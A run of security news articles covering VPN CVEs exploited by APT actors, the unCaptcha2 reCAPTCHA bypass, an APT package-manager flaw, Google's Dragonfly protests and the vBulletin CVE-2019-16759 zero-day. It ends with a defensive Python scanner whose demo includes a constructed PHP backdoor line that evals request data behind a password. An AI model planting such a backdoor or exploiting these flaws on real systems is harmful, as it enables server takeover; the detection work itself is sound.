Source: IBM Source: IBM Here are some of the key takeaways that individuals can benefit from, from this mobile Security Operations center: #1 Focus on Response Training and Preparedness The C-TOC will simulate real world scenarios to depict how hackers operate- to help companies train their teams to respond to attacks. The training will cover key strategies to protect business and its resources from cyberattacks. #2 Onsite Cybersecurity Support The C-TOC is mobile and can be deployed as an on-demand Security Operation Center. It aims to provide a realistic cybersecurity experience in the industry while visiting local universities and industries to build interest in cybersecurity careers and to address other cybersecurity concerns. #3 Cyber Best Practices Laboratory The C-TOC training includes real world examples based on experiences with customers in the Cambridge Cyber Range. Attack scenarios will be designed for teams to participate in. The challenges are designed keeping in mind various pointers like: working as a team to mitigate attacks, thinking as a hacker, hands- on experience with a malicious toolset and much more #4 Supplementary Cybersecurity Operations The IBM team also aims to spread awareness on the cybersecurity workforce shortage that is anticipated soon. With an expected shortfall of nearly 2 million cybersecurity professionals by 2022, it is necessary to educate the masses about careers in security as well as help upskill current professionals in cybersecurity. This is one of the many initiatives taken by IBM to bring about awareness about the importance of mitigating cyber attacks in time. Back in 2016, IBM invested $200 million in new incident response facilities, services and software, which included the industry's first Cyber Range for the commercial sector. 
By real world simulation of cyber attacks and training individuals to come up with advanced defense strategies, the SOC aims to get a realistic cyberattack preparation and rehearsal to a larger, global audience. To know more about this news as well as the dates that the C-TOC will tour the U.S. and Europe, head over to IBM’s official blog. Mozilla announces $3.5 million award for ‘Responsible Computer Science Challenge’ to encourage teaching ethical coding to CS graduates The Intercept says Google’s Dragonfly is closer to launch than Google would like us to believe U.S Government Accountability Office (GAO) reports U.S weapons can be easily hacked  
NCSC investigates several vulnerabilities in VPN products from Pulse secure, Palo Alto and Fortinet

Fatema Patrawala
07 Oct 2019
3 min read
Last week, the National Cyber Security Centre (NCSC) reported that it is investigating the exploitation, by Advanced Persistent Threat (APT) actors, of known vulnerabilities in VPN products. These VPN products are from the vendors Pulse Secure, Palo Alto and Fortinet. It is an ongoing activity, targeting UK and other international organizations. According to NCSC, affected sectors include government, military, academic, business and healthcare.

Vulnerabilities exist in several SSL VPN products

As per the report, vulnerabilities exist in several SSL VPN products that can allow an attacker to retrieve arbitrary files containing authentication credentials. An attacker can use these stolen credentials to connect to the VPN and change configuration settings or connect to further internal infrastructure. The report also highlights that an unauthorized connection to a VPN can provide the attacker with the privileges needed to run secondary exploits aimed at accessing a root shell.

Top vulnerabilities in VPN products exploited by APTs

The highest-impact vulnerabilities known to be exploited by APTs are listed below:

Pulse Connect Secure:
• CVE-2019-11510: Pre-auth arbitrary file reading
• CVE-2019-11539: Post-auth command injection

Fortinet:
• CVE-2018-13379: Pre-auth arbitrary file reading
• CVE-2018-13382: Allows an unauthenticated attacker to change the password of an SSL VPN web portal user
• CVE-2018-13383: Post-auth heap overflow. This allows an attacker to gain a shell running on the router

Palo Alto:
• CVE-2019-1579: Palo Alto Networks GlobalProtect Portal

NCSC suggests that users of these VPN products should investigate their logs for evidence of compromise, especially if the security patches were not applied immediately after their release. Additionally, administrators should look for evidence of compromised accounts in active use, such as anomalous IP locations or times. The report also covers product-specific advice to detect exploitation in VPN connections.

Steps to mitigate the vulnerabilities in VPN products

NCSC provides essential steps to mitigate the risk of these vulnerabilities. They suggest that owners of vulnerable products should promptly take two steps:
• Apply the latest security patches released by vendors
• Reset authentication credentials associated with affected VPNs and accounts connecting through them

The most effective way to mitigate the risk of actors exploiting these vulnerabilities is to ensure that the affected products are patched with the latest security updates. Pulse Secure, Palo Alto and Fortinet have released patches for these vulnerabilities. NCSC also emphasizes reporting any current activity related to these threats to incidents@ncsc.gov.uk, where they will offer help and guidance.

On Hacker News, this report has gained significant traction and users are discussing the nature of various VPN products and services. One of them commented, “Commercial enterprise VPN products are an open sewer, and there aren't any, from any vendor, that I trust. I don't like OpenVPN or strongSwan, but you'd be better off with either of them than you would be with a commercial VPN appliance. The gold standard, as ever, is Wireguard.”

To know more about this report, check out the official NCSC website.
Researchers release unCaptcha2, a tool that uses Google’s speech-to-text API to bypass the reCAPTCHA audio challenge

Natasha Mathur
07 Jan 2019
3 min read
A team of researchers at the University of Maryland released unCaptcha2 last week, an updated version of their tool unCaptcha, which defeated Google's reCAPTCHA audio challenge with 85.15% accuracy in 2017.

Google’s audio challenge is aimed at solving reCAPTCHA's accessibility problem for visually challenged people who can’t see where to "tick the box" to prove that they’re a human and not a robot. Hence, they’re offered an option to listen to the audio and enter what they hear as a response.

unCaptcha, which was released in 2017, managed to pass the reCAPTCHA audio system by using an approach that involved downloading the audio and segmenting it. These segments were then uploaded to multiple speech-to-text services, which in turn would convert the message. Finally, the response obtained would be typed into the reCAPTCHA form to solve the challenge.

However, after the attack in 2017, Google updated the reCAPTCHA form with changes such as improved browser automation detection and the use of spoken phrases instead of digits. These changes successfully protected reCAPTCHA from the 2017 unCaptcha attack but failed to protect it from the new unCaptcha2. “As of June 2018, these challenges have been solved. The reCAPTCHA team ... is ... fully aware of this attack. The team has allowed us to release the code. The code now only needs to make a single request to a free, publicly available speech to text API (by Google) to achieve around 90% accuracy over all the captchas”, states the team.

unCaptcha2 makes use of a screen clicker that helps it move to certain pixels on the screen and move around the webpage as a human would. However, this method is not very robust and still needs more work. Also, unCaptcha2 uses a different approach than the first version and no longer requires multiple speech-to-text engines or the segmentation approach.

unCaptcha2 involves navigating to Google's reCAPTCHA demo site, navigating to the audio challenge, and then downloading the audio challenge. After this step, the audio challenge is submitted to speech-to-text services. Finally, the response obtained is typed in and submitted to solve the challenge. “unCaptcha2, like the original version, is meant to be a proof of concept. As Google updates its service, this repository will not be updated. As a result, it is not expected to work in the future, and is likely to break at any time,” state the researchers.
Remote Code Execution Flaw in APT Linux Package Manager allows man-in-the-middle attack

Melisha Dsouza
23 Jan 2019
3 min read
Yesterday a remote code execution bug was found in APT, the high-level package manager used by Debian, Ubuntu, and other related Linux distributions. Max Justicz, the security researcher who discovered the bug, says that it "allows a network man-in-the-middle (or a malicious package mirror) to execute arbitrary code as root on a machine installing any package.”

Justicz’s blog post states that vulnerable versions of APT don't properly sanitize certain parameters during HTTP redirects. An attacker can take advantage of this and perform a remote man-in-the-middle attack to inject malicious content, thus tricking the system into installing altered packages. HTTP redirects during an apt-get run let Linux machines automatically request packages from an appropriate mirror server when other servers are unavailable: if the first server fails, it returns the location of the next server from which the client should request the package.

Justicz has also demonstrated this man-in-the-middle attack in a short video: https://justi.cz/assets/aptpoc.mp4

Justicz told The Hacker News that a malicious actor intercepting HTTP traffic between the APT utility and a mirror server, or simply a malicious mirror, could execute arbitrary code on the targeted system with the highest level of privileges, i.e. root. He further adds, "You can completely replace the requested package, as in my proof of concept. You could substitute a modified package as well if you wanted to”.

APT is used by major Linux distributions such as Debian and Ubuntu, which have acknowledged the vulnerability and released security patches for it. The Hacker News also points out how this flaw surfaced at a time when cybersecurity experts were arguing on Twitter in favor of not using HTTPS, suggesting that software developers rely on signature-based package verification, as APT on Linux already does.

They further add that exploitation of APT could have been mitigated if the software download manager had strictly used HTTPS to communicate securely. The developers of APT have released version 1.4.9, which fixes the issue. The bug has also been fixed in the APT 1.2.29ubuntu0.1, 1.7.0ubuntu0.1, 1.0.1ubuntu2.19, and 1.6.6ubuntu0.1 packages, as well as in APT 1.4.9 for the Debian distribution. You can head over to Max Justicz's official blog for more insights on this news.
1k+ Google employees frustrated with continued betrayal, protest against Censored Search engine project for China

Fatema Patrawala
17 Aug 2018
4 min read
About a thousand Google employees, frustrated with a series of controversies involving Google, have signed a letter demanding transparency on building a censored search engine for China. The project, named Dragonfly, is a censored search engine for the Chinese market. In the letter, employees say, “Currently we do not have the information required to make ethically-informed decisions about our work, our projects, and our employment.” The letter, published by BuzzFeed News, was circulated on Google’s internal communications system and is signed by about 1,400 Googlers.

The Dragonfly project would be Google’s return to China after 8 years, following its withdrawal in protest against censorship and government hacking. China has the world’s largest internet audience but has frustrated American tech giants with content restrictions or outright blockages of services including Facebook and Instagram.

Crisis already brewing at Google

This is not the first time Google’s outspoken workforce has been agitated by changes in strategy. In April, the internet company’s employees spoke out against its involvement in a Pentagon program that uses artificial intelligence to improve weaponry. Over 4,000 employees signed a petition asking the company to cancel it. A dozen engineers resigned in protest, and Google eventually promised not to renew the contract. Following that uproar, Google published AI ethics guidelines for the company. The letter about Dragonfly that's currently being circulated inside the company argues that those guidelines are not enough. "As a company and as individuals we have a responsibility to use this power to better the world, not to support social control, violence, and oppression," the letter reads. "What is clear is that Ethical Principles on paper are not enough to ensure ethical decision making. We need transparency, oversight, and accountability mechanisms sufficient to allow informed ethical choice and deliberation across the company."

What does Google’s management say

Allison Day, a program manager at Google, is not shocked by this outrage and told BuzzFeed News, “I can see the bottom line for any corporation is growth, and [China] represented a gigantic market,” she said. “The ‘Don’t be Evil’ slogan or whatever is, you know… It’s not a farce. I wouldn’t go so far as to say that. But it is a giant corporation, and its bottom line is to make money.”

Google CEO Sundar Pichai has repeatedly expressed interest in the company making a return to China, which it pulled out of for political reasons in 2010. Pichai’s apparent decision to return, which was not addressed companywide before Thursday, has caused some employees to consider leaving the company altogether. “There are questions about how [Dragonfly] is implemented that could make it less concerning, or much more concerning,” an anonymous Google employee said. “That will continue to be on my mind, and the mind of other Googlers deciding whether to stay.”

The Dragonfly project secrecy

Two Google employees who were working on Dragonfly were so disturbed by the secrecy that they quit the team over it. Developers working on the project had been asked to keep Dragonfly confidential, not just from the public but also from their coworkers. Even more upsetting to some employees is the fact that the company has blocked internal access to Dragonfly’s code. Managers also shut down access to certain documents pertaining to the project, according to The Intercept. Employees feel that this is a special kind of betrayal and erosion of trust, because the company talks and acts as if, “Once you’re at Google, you can look up the code anywhere in the code base and see for yourself.” “We pride ourselves on having an open and transparent culture,” said the anonymous Google developer. “There [are] definitely employees at the company who are very frustrated because that’s clearly not true.”

Google has not responded to specific questions about Dragonfly from The Intercept, Bloomberg, or BuzzFeed News, saying only in a statement, “We don’t comment on speculation about future plans.” An anonymous Google developer said, “Even though a lot of us have really good jobs, we can see that the difference between us and the leadership is still astronomical. The vision they have for the future is not our vision.”
A zero-day pre-auth vulnerability is currently being exploited in vBulletin, reports an anonymous researcher

Vincy Davis
26 Sep 2019
4 min read
Update: Six days after an anonymous researcher disclosed a zero-day pre-auth remote code execution vulnerability in vBulletin, Cloudflare deployed a new rule within its Cloudflare Specials Rulesets (ruleId: 100166). The Cloudflare team states, “We assess this vulnerability to be very significant as it has a CVSS score of 9.8/10 and affects 7 out of the 10 key risk areas of the OWASP 2017 Top 10. Protection against common RCE attacks is a standard feature of Cloudflare's Managed Rulesets.” Cloudflare customers with Managed Rulesets and Cloudflare Specials can be protected against this vulnerability by enabling the WAF Managed Rulesets in the Firewall tab of Cloudflare. Head over to the Cloudflare blog for more details about Cloudflare’s protection against this vulnerability.

On September 23rd, an anonymous researcher published a zero-day pre-authentication remote code execution vulnerability in vBulletin, which allows an attacker to remotely execute shell commands on any vBulletin server running versions 5.0.0 up to 5.5.4. The vulnerability was disclosed on Full Disclosure, a public mailing list. Yesterday, the vBulletin team issued a security patch for this vulnerability, which is now tracked as CVE-2019-16759.

How does the zero-day vulnerability in vBulletin work

Ryan Seguin, a research engineer at Tenable, explains in his blog that this vulnerability relies on default vBulletin configurations. An unauthenticated attacker can send a specially crafted HTTP POST request to a vulnerable vBulletin host and execute commands. He further states, “These commands would be executed with the permissions of the user account that the vBulletin service is utilizing. Depending on the service user’s permissions, this could allow complete control of a host.” In practice the blast radius is set by the web server account running PHP: if that account can write to the forum’s own code directory, an attacker can persist by editing application files, which is exactly what the backdoor described below does.

Another security researcher, Troy Mursch of the Bad Packets security intelligence service, told Ars Technica that attackers are using botnets to actively exploit vulnerable servers. The exploit, Mursch says, can modify includes/vb5/frontend/controller/bbcode.php via the "sed" command to add a backdoor to the code. Mursch adds, “This is done by setting a “password” (epass) of 2dmfrb28nu3c6s9j. By doing this, the compromised site will only execute code in the eval function if 2dmfrb28nu3c6s9j is set in future requests sent to the server. This would allow a botnet command-and-control (C2) server to exclusively exploit CVE-2019-16759 and issue commands to the targeted site. The vulnerability itself has been regarded by some as a backdoor.”

Attackers are using this backdoor to enrol compromised sites into a botnet, through which they can set up further ways of exploiting the infected hosts. The backdoor can be used to install DDoS malware on compromised hosts and conduct denial-of-service attacks.

It is not yet known whether the anonymous publisher reported the vulnerability to the vBulletin team before disclosing it. Another possibility is that the vBulletin team could not find a timely fix, prompting the researcher to publish the vulnerability on Full Disclosure. The anonymous researcher published the zero-day from an unnamed email service.

Why is a vulnerability in vBulletin so severe?

vBulletin, a popular web forum software package, has around 0.1% market share of all forums running on the internet. Though the percentage looks small, the vulnerability can affect billions of internet users, reports ZDNet, because vBulletin stores information about its registered users: “While billions of internet sites don't store any info about users, a handful of online forums could very easily store data on most internet users. Therefore, a market share of 0.1% is actually pretty significant, when we factor in how many users could be registered on these forums.”

Steam, EA, Zynga, NASA, Sony, BodyBuilding.com, the Houston Texans, and the Denver Broncos are among the customers that use vBulletin.

Yesterday, the cybersecurity company GreyNoise tweeted that attackers are actively using this vulnerability against vulnerable forums.

https://twitter.com/GreyNoiseIO/status/1176898873622781954

According to Chaouki Bekrar, founder and CEO of the exploit broker Zerodium, the vulnerability has been known for many years.

https://twitter.com/cBekrar/status/1176803541047861249

The vBulletin team has issued a patch for CVE-2019-16759 for vBulletin versions 5.5.2, 5.5.3, and 5.5.4. Users on earlier versions of vBulletin 5.x are advised to update to one of the supported versions in order to apply the patch. The vBulletin Cloud version has already been updated with the fix.
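The two facts a forum operator can act on from the reports above are the affected version range (5.0.0 through 5.5.4) and the backdoor markers Troy Mursch describes in includes/vb5/frontend/controller/bbcode.php (the epass value 2dmfrb28nu3c6s9j gating an eval). The following triage script is an added example written for this page; it is not code from the article, from Bad Packets, or from vBulletin. The PHP snippets it scans are constructed for the demonstration to match Mursch's description, not a captured sample of the real injected code, and the article does not say whether applying the patch changes the version string, so a version inside the affected range should be read as "confirm the patch is applied", not as proof of compromise.

```python
"""Triage helpers for CVE-2019-16759 reports (added example, not the
article's or vBulletin's code).

- version_in_affected_range(): is a vBulletin 5.x version string inside
  the 5.0.0 .. 5.5.4 range named in the disclosure?  Assumption: the patch
  does not necessarily bump the version, so "in range" means "verify the
  patch", not "compromised".
- find_backdoor_indicators(): scan bbcode.php source for the markers Mursch
  describes (the epass value 2dmfrb28nu3c6s9j and an eval() gated on it).
  A clean result is not a clean bill of health: the real injected code
  may use different names or a different password.
"""
from __future__ import annotations

import re

AFFECTED_MIN = (5, 0, 0)
AFFECTED_MAX = (5, 5, 4)
EPASS_MARKER = "2dmfrb28nu3c6s9j"  # value quoted by Mursch
TARGET_FILE = "includes/vb5/frontend/controller/bbcode.php"

# Constructed sample PHP for the demo: a stand-in "clean" controller and the
# same file with a backdoor of the shape Mursch describes appended to it.
CLEAN_SNIPPET = """<?php
// original vBulletin controller code (omitted in this constructed sample)
function render_bbcode($input) { return htmlspecialchars($input); }
"""
INFECTED_SNIPPET = CLEAN_SNIPPET + (
    'if (isset($_REQUEST["epass"]) && $_REQUEST["epass"] == "'
    + EPASS_MARKER + '") { eval($_REQUEST["code"]); }\n'
)


def parse_version(version: str) -> tuple[int, int, int]:
    """Turn '5.5.4' (optionally followed by a suffix) into a comparable tuple."""
    m = re.fullmatch(r"\s*(\d+)\.(\d+)\.(\d+)(?:\s.*)?", version)
    if not m:
        raise ValueError(f"unrecognised vBulletin version string: {version!r}")
    major, minor, patch = (int(x) for x in m.groups())
    return (major, minor, patch)


def version_in_affected_range(version: str) -> bool:
    """True if the version lies in 5.0.0 .. 5.5.4 inclusive."""
    return AFFECTED_MIN <= parse_version(version) <= AFFECTED_MAX


def find_backdoor_indicators(php_source: str) -> list[str]:
    """Return a list of human-readable indicators found in bbcode.php source."""
    hits: list[str] = []
    if EPASS_MARKER in php_source:
        hits.append(f"epass marker {EPASS_MARKER} present")
    # eval() fed directly from request data, anywhere in the file
    if re.search(r"\beval\s*\(\s*\$_(?:REQUEST|POST|GET)\b", php_source):
        hits.append("eval() of request-controlled data")
    # an eval() shortly after a comparison against the marker: the gate
    # Mursch describes, which makes the backdoor usable only by its owner
    if re.search(re.escape(EPASS_MARKER) + r".{0,200}?\beval\s*\(", php_source, re.S):
        hits.append("eval() gated on epass marker")
    return hits


def scan_bbcode_file(path: str) -> list[str]:
    """Read a real bbcode.php from disk and scan it."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return find_backdoor_indicators(fh.read())


if __name__ == "__main__":
    for v in ("5.5.4", "5.0.0", "5.5.5", "4.2.5"):
        print(f"vBulletin {v}: affected range -> {version_in_affected_range(v)}")
    print("clean sample:", find_backdoor_indicators(CLEAN_SNIPPET))
    print("infected sample:", find_backdoor_indicators(INFECTED_SNIPPET))
```

Run it against a real install with scan_bbcode_file("/path/to/forum/" + TARGET_FILE); any hit means the file differs from the shipped version and the host should be treated as compromised rather than merely patched, since the backdoor survives the vendor patch.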